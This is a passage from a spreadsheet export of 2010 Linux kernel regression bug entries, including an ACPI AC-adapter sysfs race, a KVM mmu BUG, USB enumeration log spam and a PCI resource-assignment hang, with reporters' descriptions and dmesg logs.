    <t>Subject : 2.6.35-&gt;2.6.36 regression, vanilla kernel panic, ppp or hrtimers crashing Submitter : Denys Fedoryshchenko &lt;nuclearcat@nuclearcat.com&gt; Date : 2010-10-25 9:22 Message-ID : 201010251222.37191.nuclearcat@nuclearcat.com References : http://marc.info/?l=linux-kernel&amp;m=128799855826011&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>AC sysfs I/F exports cached AC status</t>
  </si>
  <si>
    <t>2010-11-02 00:27 UTC</t>
  </si>
  <si>
    <t>2011-01-06 03:27 UTC</t>
  </si>
  <si>
    <t>reported by Seblu(seblu@seblu.net) in the maillist, http://marc.info/?l=linux-acpi&amp;m=128855015826728&amp;w=2 When starting up my laptop my AC adapter dectection was not done correctly in sysfs, but correclty via procfs. At first sight this was weird because acpitool calls ask my power adapter is online, but my kde power manager dected adapter off-line. $acpitool Battery #1 : charged, 100.0%, 00:00:00 AC adapter : on-line Thermal info : &lt;not available&gt; acpitool bring informations from /proc fs $ cat /proc/acpi/ac_adapter/AC/state state: on-line So my system see correctly AC plugging state, so why kde not? After some tracing, it seems that : kde power manager use powerdevi, which use solid, which use hal, which use sysfs. $ lshal -u /org/freedesktop/Hal/devices/computer_power_supply_ac_adapter_AC udi = '/org/freedesktop/Hal/devices/computer_power_supply_ac_adapter_AC' ac_adapter.present = false (bool) info.capabilities = {'ac_adapter'} (string list) info.category = 'ac_adapter' (string) info.parent = '/org/freedesktop/Hal/devices/computer' (string) info.product = 'Generic AC Adapter Device' (string) info.subsystem = 'power_supply' (string) info.udi = '/org/freedesktop/Hal/devices/computer_power_supply_ac_adapter_AC' (string) linux.hotplug_type = 2 (0x2) (int) linux.subsystem = 'power_supply' (string) linux.sysfs_path = '/sys/devices/LNXSYSTM:00/device:00/ACPI0003:00/power_supply/AC' (string) Got it, hal says adapter is offline... cat /sys/devices/LNXSYSTM:00/device:00/ACPI0003:00/power_supply/AC/online 255 watching dmesg show error about acpi ac adapter reading... (in pj) The most strange for me, is, if i call acpitool or cat /proc/acpi/ac_adapter/AC/state, value in /sys/devices/LNXSYSTM:00/device:00/ACPI0003:00/power_supply/AC/online the answer goes right become 1. And so everything become ok. if i unplug and plug again the power cord, online state is reported correctly. This issue is only when the pc start with power cord plugged. I believe, issue come from a race condition, because if in my init script i access to /proc acpi file, and after hal start, status is reported correctly. My current workaround is to load ac module in initrd, because, distro startup run udevadm trigger after and when it's done before, behaviour was like i said before. my test was done on a dell laptop e6410 under linux-next-2010-10-29 and 2.6.35.8. (2.6.36 has big drm-intel regression on my laptop and become unusable). $uname -a Linux rwolf 2.6.36-next-20101029 #1 SMP PREEMPT Sun Oct 31 17:34:37 CET 2010 x86_64 Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz GenuineIntel GNU/Linux</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel NULL pointer dereference at 0000000c (elv_quiesce_start)</t>
  </si>
  <si>
    <t>2.6.37-rc1</t>
  </si>
  <si>
    <t>2010-11-02 20:40 UTC</t>
  </si>
  <si>
    <t>2010-11-18 22:54 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: unable to handle kernel NULL pointer dereference at 0000000c (elv_quiesce_start) Submitter : Fabio Comolli &lt;fabio.comolli@gmail.com&gt; Date : 2010-10-23 17:39 Message-ID : AANLkTi=C4QpqAir0uf5tKbb_ZNo5BAuV3TAtY2mMu6bs@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128785556619362&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NFS Client file access problem firefox</t>
  </si>
  <si>
    <t>2010-11-03 14:13 UTC</t>
  </si>
  <si>
    <t>2010-11-18 23:11 UTC</t>
  </si>
  <si>
    <t>After startup Firefox reports: The bookmarks and history system will not be functional because one of Firefox's files is in use by another application. Some security software can cause this problem. There an info button which points to: http://support.mozilla.com/en-US/kb/The+bookmarks+and+history+system+will+not+be+functional?style_mode=inproduct&amp;as=u</t>
  </si>
  <si>
    <t>BUG() in kvm_mmu_page_set_gfn() - direct gfn doesn't match page gfn</t>
  </si>
  <si>
    <t>Since 2.6.36</t>
  </si>
  <si>
    <t>2010-11-04 00:38 UTC</t>
  </si>
  <si>
    <t>2011-01-04 10:40 UTC</t>
  </si>
  <si>
    <t>Kernel since 2.6.36 can't be used on HP Proliant DL 160 G5 (2x Intel Xeon CPU E5430): This kernel bug has been occured on 2.6.37-rc1-git2: kernel BUG at arch/x86/kvm/mmu.c 479! static void kvm_mmu_page_set_gfn(struct kvm_mmu_page *sp, int index, gfn_t gfn) { if (sp-&gt;role.direct) -&gt; BUG_ON(gfn != kvm_mmu_page_get_gfn(sp, index)); else sp-&gt;gfns[index] = gfn; } invalid opcode: 0000 mmu_set_spte.clone.57.clone.60x0x4a2/0x4e0 [kvm] All KVM virtual machines can't be correctly used and server have to be power off. This situation occured since 2.6.36.</t>
  </si>
  <si>
    <t>Logs spammed with "unable to enumerate USB port" in 2.6.37-rc1 - bisected to commit 3df7169e</t>
  </si>
  <si>
    <t>2010-11-04 14:16 UTC</t>
  </si>
  <si>
    <t>2012-02-23 21:52 UTC</t>
  </si>
  <si>
    <t>Created attachment 36162 [details] Full output from dmesg Commit 3df7169e73fc1d71a39cffeacc969f6840cdf52b causes my system to spam the logs with messages of the form "hub 2-0:1.0: unable to enumerate USB device on port 5". Bisection was used to locate that commit. Although reverting the above commit restores the original behavior, I am coming to believe that the true bug is somewhere else, and that the patch merely allows it to be triggered. Note: The "failure to enumerate" messages have been seen previously on this hardware; however, loading ehci_hcd before ohci_hcd "fixed" the problem in that instance. ============================================== I enabled USB debugging. Although I don't understand all the data, this section looks strange. ehci_hcd 0000:00:04.1: GetStatus port:5 status 003001 0 ACK POWER OWNER sig=se0 CONNECT hub 2-0:1.0: port 5 not reset yet, waiting 50ms ehci_hcd 0000:00:04.1: GetStatus port:5 status 001002 0 ACK POWER sig=se0 CSC hub 2-0:1.0: unable to enumerate USB device on port 5 =========================================== A bigger portion of the dmesg output with USB debugging enabled follows (full dmesg output attached): usb usb1: usb_probe_device usb usb1: configuration #1 chosen from 1 choice usb usb1: adding 1-0:1.0 (config #1, interface 0) ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver ohci_hcd: block sizes: ed 80 td 96 hub 1-0:1.0: usb_probe_interface hub 1-0:1.0: usb_probe_interface - got id hub 1-0:1.0: USB hub found hub 1-0:1.0: 5 ports detected hub 1-0:1.0: standalone hub hub 1-0:1.0: no power switching (usb 1.0) hub 1-0:1.0: individual port over-current protection hub 1-0:1.0: power on to power good time: 20ms hub 1-0:1.0: local power source is good hub 1-0:1.0: trying to enable port power on non-switchable hub drivers/usb/core/inode.c: creating file '001' ACPI: PCI Interrupt Link [Z013] enabled at IRQ 16 ehci_hcd 0000:00:04.1: PCI INT B -&gt; Link[Z013] -&gt; GSI 16 (level, low) -&gt; IRQ 16 ehci_hcd 0000:00:04.1: setting latency timer to 64 ehci_hcd 0000:00:04.1: EHCI Host Controller drivers/usb/core/inode.c: creating file '002' ehci_hcd 0000:00:04.1: new USB bus registered, assigned bus number 2 ehci_hcd 0000:00:04.1: reset hcs_params 0x101c85 dbg=1 cc=1 pcc=12 !ppc ports=5 ehci_hcd 0000:00:04.1: reset portroute 0 0 0 0 0 ehci_hcd 0000:00:04.1: reset hcc_params a087 caching frame 256/512/1024 park 64 bit addr ehci_hcd 0000:00:04.1: park 0 ehci_hcd 0000:00:04.1: debug port 1 ehci_hcd 0000:00:04.1: reset command 0080b02 park=3 ithresh=8 period=1024 Reset HALT ehci_hcd 0000:00:04.1: cache line size of 64 is not supported ehci_hcd 0000:00:04.1: supports USB remote wakeup ehci_hcd 0000:00:04.1: irq 16, io mem 0xfc489400 ehci_hcd 0000:00:04.1: reset command 0080b02 park=3 ithresh=8 period=1024 Reset HALT ehci_hcd 0000:00:04.1: init command 0010005 (park)=0 ithresh=1 period=512 RUN sda: sda1 sda2 sda3 sda4 &lt; sda5 &gt; ehci_hcd 0000:00:04.1: USB 2.0 started, EHCI 1.00 usb usb2: default language 0x0409 usb usb2: udev 1, busnum 2, minor = 128 usb usb2: New USB device found, idVendor=1d6b, idProduct=0002 usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb2: Product: EHCI Host Controller usb usb2: Manufacturer: Linux 2.6.37-rc1-realtek+ ehci_hcd usb usb2: SerialNumber: 0000:00:04.1 usb usb2: usb_probe_device usb usb2: configuration #1 chosen from 1 choice usb usb2: adding 2-0:1.0 (config #1, interface 0) hub 2-0:1.0: usb_probe_interface hub 2-0:1.0: usb_probe_interface - got id hub 2-0:1.0: USB hub found hub 2-0:1.0: 5 ports detected hub 2-0:1.0: standalone hub hub 2-0:1.0: no power switching (usb 1.0) hub 2-0:1.0: individual port over-current protection hub 2-0:1.0: power on to power good time: 20ms hub 2-0:1.0: local power source is good hub 2-0:1.0: trying to enable port power on non-switchable hub drivers/usb/core/inode.c: creating file '001' ACPI: PCI Interrupt Link [LUS0] enabled at IRQ 17 ohci_hcd 0000:00:02.0: PCI INT A -&gt; Link[LUS0] -&gt; GSI 17 (level, low) -&gt; IRQ 17 ohci_hcd 0000:00:02.0: setting latency timer to 64 ohci_hcd 0000:00:02.0: OHCI Host Controller drivers/usb/core/inode.c: creating file '003' ohci_hcd 0000:00:02.0: new USB bus registered, assigned bus number 3 sd 0:0:0:0: [sda] Attached SCSI disk ohci_hcd 0000:00:02.0: enabled nVidia shutdown quirk ohci_hcd 0000:00:02.0: created debug files ohci_hcd 0000:00:02.0: supports USB remote wakeup ohci_hcd 0000:00:02.0: irq 17, io mem 0xfc486000 ohci_hcd 0000:00:02.0: OHCI: hc_control 0x200 ehci_hcd 0000:00:02.1: GetStatus port:1 status 001803 0 ACK POWER sig=j CSC CONNECT hub 1-0:1.0: port 1: status 0501 change 0001 ehci_hcd 0000:00:02.1: GetStatus port:4 status 001803 0 ACK POWER sig=j CSC CONNECT hub 1-0:1.0: port 4: status 0501 change 0001 ehci_hcd 0000:00:02.1: GetStatus port:5 status 001803 0 ACK POWER sig=j CSC CONNECT hub 1-0:1.0: port 5: status 0501 change 0001 ohci_hcd 0000:00:02.0: OHCI controller state ohci_hcd 0000:00:02.0: OHCI 1.0, NO legacy support registers ohci_hcd 0000:00:02.0: control 0x683 RWE RWC HCFS=operational CBSR=3 ohci_hcd 0000:00:02.0: cmdstatus 0x00000 SOC=0 ohci_hcd 0000:00:02.0: intrstatus 0x00000004 SF ohci_hcd 0000:00:02.0: intrenable 0x8000005a MIE RHSC UE RD WDH ohci_hcd 0000:00:02.0: hcca frame #0003 ohci_hcd 0000:00:02.0: roothub.a 01000205 POTPGT=1 NPS NDP=5(5) ohci_hcd 0000:00:02.0: roothub.b 00000000 PPCM=0000 DR=0000 ohci_hcd 0000:00:02.0: roothub.status 00008000 DRWE ohci_hcd 0000:00:02.0: roothub.portstatus [0] 0x00000100 PPS ohci_hcd 0000:00:02.0: roothub.portstatus [1] 0x00000100 PPS ohci_hcd 0000:00:02.0: roothub.portstatus [2] 0x00000100 PPS ohci_hcd 0000:00:02.0: roothub.portstatus [3] 0x00000100 PPS ohci_hcd 0000:00:02.0: roothub.portstatus [4] 0x00000100 PPS usb usb3: default language 0x0409 usb usb3: udev 1, busnum 3, minor = 256 usb usb3: New USB device found, idVendor=1d6b, idProduct=0001 usb usb3: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb3: Product: OHCI Host Controller usb usb3: Manufacturer: Linux 2.6.37-rc1-realtek+ ohci_hcd usb usb3: SerialNumber: 0000:00:02.0 usb usb3: usb_probe_device usb usb3: configuration #1 chosen from 1 choice usb usb3: adding 3-0:1.0 (config #1, interface 0) hub 3-0:1.0: usb_probe_interface hub 3-0:1.0: usb_probe_interface - got id hub 3-0:1.0: USB hub found hub 3-0:1.0: 5 ports detected hub 3-0:1.0: standalone hub hub 3-0:1.0: no power switching (usb 1.0) hub 3-0:1.0: global over-current protection hub 3-0:1.0: power on to power good time: 2ms hub 3-0:1.0: local power source is good hub 3-0:1.0: no over-current condition exists hub 3-0:1.0: trying to enable port power on non-switchable hub drivers/usb/core/inode.c: creating file '001' ehci_hcd 0000:00:02.1: HS companion for 0000:00:02.0 ACPI: PCI Interrupt Link [Z012] enabled at IRQ 16 ohci_hcd 0000:00:04.0: PCI INT A -&gt; Link[Z012] -&gt; GSI 16 (level, low) -&gt; IRQ 16 ohci_hcd 0000:00:04.0: setting latency timer to 64 ohci_hcd 0000:00:04.0: OHCI Host Controller drivers/usb/core/inode.c: creating file '004' ohci_hcd 0000:00:04.0: new USB bus registered, assigned bus number 4 ohci_hcd 0000:00:04.0: enabled nVidia shutdown quirk ohci_hcd 0000:00:04.0: created debug files ohci_hcd 0000:00:04.0: supports USB remote wakeup ohci_hcd 0000:00:04.0: irq 16, io mem 0xfc487000 ohci_hcd 0000:00:04.0: OHCI: hc_control 0x200 ehci_hcd 0000:00:04.1: GetStatus port:5 status 001c03 0 ACK POWER sig=? CSC CONNECT hub 2-0:1.0: port 5: status 0501 change 0001 ohci_hcd 0000:00:04.0: OHCI controller state ohci_hcd 0000:00:04.0: OHCI 1.0, NO legacy support registers ohci_hcd 0000:00:04.0: control 0x683 RWE RWC HCFS=operational CBSR=3 ohci_hcd 0000:00:04.0: cmdstatus 0x00000 SOC=0 ohci_hcd 0000:00:04.0: intrstatus 0x00000004 SF ohci_hcd 0000:00:04.0: intrenable 0x8000005a MIE RHSC UE RD WDH ohci_hcd 0000:00:04.0: hcca frame #0003 ohci_hcd 0000:00:04.0: roothub.a 01000205 POTPGT=1 NPS NDP=5(5) ohci_hcd 0000:00:04.0: roothub.b 00000000 PPCM=0000 DR=0000 ohci_hcd 0000:00:04.0: roothub.status 00008000 DRWE ohci_hcd 0000:00:04.0: roothub.portstatus [0] 0x00000100 PPS ohci_hcd 0000:00:04.0: roothub.portstatus [1] 0x00000100 PPS ohci_hcd 0000:00:04.0: roothub.portstatus [2] 0x00000100 PPS ohci_hcd 0000:00:04.0: roothub.portstatus [3] 0x00000100 PPS ohci_hcd 0000:00:04.0: roothub.portstatus [4] 0x00000100 PPS usb usb4: default language 0x0409 usb usb4: udev 1, busnum 4, minor = 384 usb usb4: New USB device found, idVendor=1d6b, idProduct=0001 usb usb4: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb4: Product: OHCI Host Controller usb usb4: Manufacturer: Linux 2.6.37-rc1-realtek+ ohci_hcd usb usb4: SerialNumber: 0000:00:04.0 usb usb4: usb_probe_device usb usb4: configuration #1 chosen from 1 choice usb usb4: adding 4-0:1.0 (config #1, interface 0) hub 4-0:1.0: usb_probe_interface hub 4-0:1.0: usb_probe_interface - got id hub 4-0:1.0: USB hub found hub 4-0:1.0: 5 ports detected hub 4-0:1.0: standalone hub hub 4-0:1.0: no power switching (usb 1.0) hub 4-0:1.0: global over-current protection hub 4-0:1.0: power on to power good time: 2ms hub 4-0:1.0: local power source is good hub 4-0:1.0: no over-current condition exists hub 4-0:1.0: trying to enable port power on non-switchable hub drivers/usb/core/inode.c: creating file '001' ehci_hcd 0000:00:04.1: HS companion for 0000:00:04.0 hub 1-0:1.0: state 7 ports 5 chg 0032 evt 0000 hub 1-0:1.0: port 1, status 0501, change 0000, 480 Mb/s ehci_hcd 0000:00:02.1: port 1 high speed ehci_hcd 0000:00:02.1: GetStatus port:1 status 001005 0 ACK POWER sig=se0 PE CONNECT usb 1-1: new high speed USB device using ehci_hcd and address 2 ehci_hcd 0000:00:02.1: port 1 high speed ehci_hcd 0000:00:02.1: GetStatus port:1 status 001005 0 ACK POWER sig=se0 PE CONNECT usb 1-1: udev 2, busnum 1, minor = 1 usb 1-1: New USB device found, idVendor=0409, idProduct=005a usb 1-1: New USB device strings: Mfr=0, Product=0, SerialNumber=0 usb 1-1: usb_probe_device usb 1-1: configuration #1 chosen from 1 choice usb 1-1: adding 1-1:1.0 (config #1, interface 0) hub 1-1:1.0: usb_probe_interface hub 1-1:1.0: usb_probe_interface - got id hub 1-1:1.0: USB hub found hub 1-1:1.0: 4 ports detected hub 1-1:1.0: standalone hub hub 1-1:1.0: ganged power switching hub 1-1:1.0: global over-current protection hub 1-1:1.0: Single TT hub 1-1:1.0: TT requires at most 16 FS bit times (1332 ns) hub 1-1:1.0: Port indicators are supported hub 1-1:1.0: power on to power good time: 100ms hub 1-1:1.0: local power source is good hub 1-1:1.0: no over-current condition exists hub 1-1:1.0: enabling power on all ports drivers/usb/core/inode.c: creating file '002' hub 1-0:1.0: port 4, status 0501, change 0000, 480 Mb/s ehci_hcd 0000:00:02.1: port 4 high speed ehci_hcd 0000:00:02.1: GetStatus port:4 status 001005 0 ACK POWER sig=se0 PE CONNECT usb 1-1: link qh256-0001/ffff8800b3661600 start 1 [1/0 us] usb 1-4: new high speed USB device using ehci_hcd and address 3 PM: Starting manual resume from disk ehci_hcd 0000:00:02.1: port 4 high speed ehci_hcd 0000:00:02.1: GetStatus port:4 status 001005 0 ACK POWER sig=se0 PE CONNECT usb 1-4: skipped 1 descriptor after configuration usb 1-4: skipped 5 descriptors after interface usb 1-4: skipped 1 descriptor after endpoint usb 1-4: skipped 9 descriptors after interface usb 1-4: default language 0x0409 usb 1-4: udev 3, busnum 1, minor = 2 usb 1-4: New USB device found, idVendor=04f2, idProduct=b016 usb 1-4: New USB device strings: Mfr=2, Product=1, SerialNumber=3 usb 1-4: Product: HP Webcam usb 1-4: Manufacturer: Chicony Electronics Co., Ltd. usb 1-4: SerialNumber: SN0001 usb 1-4: usb_probe_device usb 1-4: configuration #1 chosen from 1 choice usb 1-4: adding 1-4:1.0 (config #1, interface 0) usb 1-4: adding 1-4:1.1 (config #1, interface 1) drivers/usb/core/inode.c: creating file '003' hub 1-0:1.0: port 5, status 0501, change 0000, 480 Mb/s ehci_hcd 0000:00:02.1: port 5 high speed ehci_hcd 0000:00:02.1: GetStatus port:5 status 001005 0 ACK POWER sig=se0 PE CONNECT usb 1-5: new high speed USB device using ehci_hcd and address 4 ehci_hcd 0000:00:02.1: port 5 high speed ehci_hcd 0000:00:02.1: GetStatus port:5 status 001005 0 ACK POWER sig=se0 PE CONNECT EXT3-fs: barriers not enabled kjournald starting. Commit interval 5 seconds EXT3-fs (sda1): using internal journal EXT3-fs (sda1): mounted filesystem with writeback data mode usb 1-5: default language 0x0409 usb 1-5: udev 4, busnum 1, minor = 3 usb 1-5: New USB device found, idVendor=07d1, idProduct=3300 usb 1-5: New USB device strings: Mfr=1, Product=2, SerialNumber=3 usb 1-5: Product: 11n Adapter usb 1-5: Manufacturer: Manufacturer Realtek usb 1-5: SerialNumber: 00e04c000001 usb 1-5: usb_probe_device usb 1-5: configuration #1 chosen from 1 choice usb 1-5: adding 1-5:1.0 (config #1, interface 0) drivers/usb/core/inode.c: creating file '004' hub 3-0:1.0: state 7 ports 5 chg 0000 evt 0000 hub 2-0:1.0: state 7 ports 5 chg 0020 evt 0000 hub 2-0:1.0: port 5, status 0501, change 0000, 480 Mb/s ehci_hcd 0000:00:04.1: port 5 full speed --&gt; companion ehci_hcd 0000:00:04.1: GetStatus port:5 status 003001 0 ACK POWER OWNER sig=se0 CONNECT hub 2-0:1.0: port 5 not reset yet, waiting 50ms ehci_hcd 0000:00:04.1: GetStatus port:5 status 001002 0 ACK POWER sig=se0 CSC hub 2-0:1.0: unable to enumerate USB device on port 5 hub 4-0:1.0: state 7 ports 5 chg 0000 evt 0000 hub 1-1:1.0: state 7 ports 4 chg 0000 evt 0000 hub 2-0:1.0: state 7 ports 5 chg 0000 evt 0020 hub 2-0:1.0: state 7 ports 5 chg 0000 evt 0020 ehci_hcd 0000:00:04.1: GetStatus port:5 status 001c03 0 ACK POWER sig=? CSC CONNECT hub 2-0:1.0: port 5, status 0501, change 0001, 480 Mb/s ohci_hcd 0000:00:02.0: auto-stop root hub hub 2-0:1.0: debounce: port 5: total 100ms stable 100ms status 0x501 ehci_hcd 0000:00:04.1: port 5 full speed --&gt; companion ehci_hcd 0000:00:04.1: GetStatus port:5 status 003001 0 ACK POWER OWNER sig=se0 CONNECT hub 2-0:1.0: port 5 not reset yet, waiting 50ms ehci_hcd 0000:00:04.1: GetStatus port:5 status 001002 0 ACK POWER sig=se0 CSC hub 2-0:1.0: unable to enumerate USB device on port 5 hub 2-0:1.0: state 7 ports 5 chg 0000 evt 0020 ohci_hcd 0000:00:04.0: auto-stop root hub hub 2-0:1.0: state 7 ports 5 chg 0000 evt 0020 ehci_hcd 0000:00:04.1: GetStatus port:5 status 001c03 0 ACK POWER sig=? CSC CONNECT hub 2-0:1.0: port 5, status 0501, change 0001, 480 Mb/s hub 2-0:1.0: debounce: port 5: total 100ms stable 100ms status 0x501 ehci_hcd 0000:00:04.1: port 5 full speed --&gt; companion ehci_hcd 0000:00:04.1: GetStatus port:5 status 003001 0 ACK POWER OWNER sig=se0 CONNECT hub 2-0:1.0: port 5 not reset yet, waiting 50ms ehci_hcd 0000:00:04.1: GetStatus port:5 status 001002 0 ACK POWER sig=se0 CSC hub 2-0:1.0: unable to enumerate USB device on port 5 hub 2-0:1.0: state 7 ports 5 chg 0000 evt 0020 hub 2-0:1.0: state 7 ports 5 chg 0000 evt 0020 ehci_hcd 0000:00:04.1: GetStatus port:5 status 001c03 0 ACK POWER sig=? CSC CONNECT =================================== The lspci output for the PCI interfaces of the USB controllers are as follows: 00:02.0 USB Controller [0c03]: nVidia Corporation MCP67 OHCI USB 1.1 Controller [10de:055e] (rev a2) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Device [103c:30d6] Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 17 Memory at fc486000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Kernel driver in use: ohci_hcd 00:02.1 USB Controller [0c03]: nVidia Corporation MCP67 EHCI USB 2.0 Controller [10de:055f] (rev a2) (prog-if 20 [EHCI]) Subsystem: Hewlett-Packard Company Device [103c:30d6] Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 17 Memory at fc489000 (32-bit, non-prefetchable) [size=256] Capabilities: [44] Debug port: BAR=1 offset=0098 Capabilities: [80] Power Management version 2 Kernel driver in use: ehci_hcd 00:04.0 USB Controller [0c03]: nVidia Corporation MCP67 OHCI USB 1.1 Controller [10de:055e] (rev a2) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Device [103c:30d6] Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 16 Memory at fc487000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Kernel driver in use: ohci_hcd 00:04.1 USB Controller [0c03]: nVidia Corporation MCP67 EHCI USB 2.0 Controller [10de:055f] (rev a2) (prog-if 20 [EHCI]) Subsystem: Hewlett-Packard Company Device [103c:30d6] Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 16 Memory at fc489400 (32-bit, non-prefetchable) [size=256] Capabilities: [44] Debug port: BAR=1 offset=0098 Capabilities: [80] Power Management version 2 Kernel driver in use: ehci_hcd</t>
  </si>
  <si>
    <t>hang in pci_bus_alloc_resource()</t>
  </si>
  <si>
    <t>2010-11-04 14:42 UTC</t>
  </si>
  <si>
    <t>2010-11-19 13:41 UTC</t>
  </si>
  <si>
    <t>Borislav Petkov found a configuration where we hang when assigning resources to an option ROM, and bisected it to commit b126b4703afa. Here's the relevant part of the dmesg log (this is with the commit reverted, and the point of hang marked): ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-4f]) pci_root PNP0A08:00: host bridge window [io 0x03b0-0x03df] pci_root PNP0A08:00: host bridge window [io 0x0d00-0x5fff] pci_root PNP0A08:00: host bridge window [mem 0x000a0000-0x000bffff] pci_root PNP0A08:00: host bridge window [mem 0xd0000000-0xd7ffffff] pci_root PNP0A08:00: host bridge window [mem 0xc8000000-0xce0fffff] pci_root PNP0A08:00: host bridge window [mem 0x000c0000-0x000cafff] pci_root PNP0A08:00: host bridge window [mem 0xfed40000-0xfed45000] pci_root PNP0A08:00: host bridge window [io 0x0000-0x03af] pci_root PNP0A08:00: host bridge window [io 0x03e0-0x0cf7] pci 0000:04:06.0: [xxxx:xxxx] type 0 class 0x000300 pci 0000:04:06.0: reg 10: [mem 0xd0000000-0xd7ffffff pref] pci 0000:04:06.0: reg 14: [io 0x5000-0x50ff] pci 0000:04:06.0: reg 18: [mem 0xce000000-0xce00ffff] pci 0000:04:06.0: reg 30: [mem 0x00000000-0x0001ffff pref] pci 0000:00:14.4: PCI bridge to [bus 04-04] (subtractive decode) pci 0000:00:14.4: bridge window [io 0x5000-0x5fff] pci 0000:00:14.4: bridge window [mem 0xce000000-0xce0fffff] pci 0000:00:14.4: bridge window [mem 0xd0000000-0xd7ffffff pref] pci 0000:00:14.4: bridge window [io 0x03b0-0x03df] (subtractive decode) pci 0000:00:14.4: bridge window [io 0x0d00-0x5fff] (subtractive decode) pci 0000:00:14.4: bridge window [mem 0x000a0000-0x000bffff] (subtractive decod e) pci 0000:00:14.4: bridge window [mem 0xd0000000-0xd7ffffff] (subtractive decode) pci 0000:00:14.4: bridge window [mem 0xc8000000-0xce0fffff] (subtractive decode) pci 0000:00:14.4: bridge window [mem 0x000c0000-0x000cafff] (subtractive decode) pci 0000:00:14.4: bridge window [mem 0xfed40000-0xfed45000] (subtractive decode) pci 0000:00:14.4: bridge window [io 0x0000-0x03af] (subtractive decode) pci 0000:00:14.4: bridge window [io 0x03e0-0x0cf7] (subtractive decode) ** hangs here unless b126b4703afa is reverted ** pci 0000:04:06.0: BAR 6: assigned [mem 0xce0e0000-0xce0fffff pref] pci 0000:00:14.4: PCI bridge to [bus 04-04] pci 0000:00:14.4: bridge window [io 0x5000-0x5fff] pci 0000:00:14.4: bridge window [mem 0xce000000-0xce0fffff] pci 0000:00:14.4: bridge window [mem 0xd0000000-0xd7ffffff pref] pci_bus 0000:04: resource 0 [io 0x5000-0x5fff] pci_bus 0000:04: resource 1 [mem 0xce000000-0xce0fffff] pci_bus 0000:04: resource 2 [mem 0xd0000000-0xd7ffffff pref] pci_bus 0000:04: resource 4 [io 0x03b0-0x03df] pci_bus 0000:04: resource 5 [io 0x0d00-0x5fff] pci_bus 0000:04: resource 6 [mem 0x000a0000-0x000bffff] pci_bus 0000:04: resource 7 [mem 0xd0000000-0xd7ffffff] pci_bus 0000:04: resource 8 [mem 0xc8000000-0xce0fffff] pci_bus 0000:04: resource 9 [mem 0x000c0000-0x000cafff] pci_bus 0000:04: resource 10 [mem 0xfed40000-0xfed45000] pci_bus 0000:04: resource 11 [io 0x0000-0x03af] pci_bus 0000:04: resource 12 [io 0x03e0-0x0cf7]</t>
  </si>
  <si>
    <t>2.6.36-git11 -- kernel/pid.c:419 invoked rcu_dereference_check() without protection!</t>
  </si>
  <si>
    <t>2.6.36-git11</t>
  </si>
  <si>
    <t>2010-11-04 18:24 UTC</t>
  </si>
  <si>
    <t>2010-12-02 20:48 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.36-git11 -- kernel/pid.c:419 invoked rcu_dereference_check() without protection! Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2010-10-29 5:22 Message-ID : AANLkTimGgzOZb8EwUQO16cZcL+ycveKTYzg_AAX+D+Kw@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128832975924288&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>USB devices not recognized without pci=nocrs - Vaio VGN-P39VRL</t>
  </si>
  <si>
    <t>2010-11-05 12:47 UTC</t>
  </si>
  <si>
    <t>sergey.khorev</t>
  </si>
  <si>
    <t>2011-07-30 06:54 UTC</t>
  </si>
  <si>
    <t>Starting from 2.6.34, USB devices are recognized only if pci=nocrs is used. Attached is output of lspci, dmesg etc for various versions</t>
  </si>
  <si>
    <t>skge module doesn't work in 2.6.37-rc1</t>
  </si>
  <si>
    <t>2010-11-05 23:14 UTC</t>
  </si>
  <si>
    <t>Jouni Mettälä</t>
  </si>
  <si>
    <t>2010-11-18 22:56 UTC</t>
  </si>
  <si>
    <t>Here is original report. https://bugs.launchpad.net/ubuntu/+source/linux/+bug/670955 I hope attached file has enough information. It has a trace.</t>
  </si>
  <si>
    <t>usbmon: completed ISO packet content is not fully arriving with mmap</t>
  </si>
  <si>
    <t>2010-11-06 14:36 UTC</t>
  </si>
  <si>
    <t>2011-03-30 23:37 UTC</t>
  </si>
  <si>
    <t>The ISO data in a completed URB is not necessarily begins at the first ISO block. When the URB is submitted then each ISO blcok is set to the maximal size. In the attached example capture (which was created with Wireshark) we can see two captured packets: the first one is the submitted URB and the second one is the completed URB. The submitted URB has 24 ISO descriptor, 800 bytes each. This URB is captured all right. The second packet contains the completed URB. In the user space we see that there are 1000 data bytes in this URB. This data is spread between ISO blocks 0...5 giving 155+160+185+174+156+170=1000. ISO desc 6...12 have zero length each. ISO desciptors 13..23 are not completed (-EXDEV). The problem is that the first 1000 bytes transfered from the kernel contains 800 bytes from the isodesc 0 out of 155 bytes are used. The next 800 bytes are not transfered completely, only the first 200 bytes out of 16 bytes are used. Then isodesc 2...5 are not transfered at all. The reason might be that in drivers/usb/mon/mon_bin.c, in function mon_bin_event() the possible gaps are not taken into account together with memory mapped operation.</t>
  </si>
  <si>
    <t>2.6.37-rc1: NULL pointer dereference</t>
  </si>
  <si>
    <t>2010-11-07 08:09 UTC</t>
  </si>
  <si>
    <t>2010-11-30 09:55 UTC</t>
  </si>
  <si>
